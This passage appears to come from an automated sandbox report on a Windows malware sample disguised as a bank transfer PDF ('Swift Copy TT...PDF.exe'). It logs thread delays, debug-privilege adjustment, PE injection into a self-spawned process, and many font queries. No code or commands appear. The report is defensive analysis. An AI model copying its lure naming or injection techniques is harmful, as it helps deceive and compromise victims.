                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595796Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595358Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 594703Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeThread delayed: delay time: 594593Jump to behavior
                Source: Swift Copy TT USDUSD$23,401.PDF.exe, 00000002.00000002.4105715037.0000000001107000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeCode function: 2_2_069A9448 LdrInitializeThunk,2_2_069A9448
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeMemory written: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess created: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
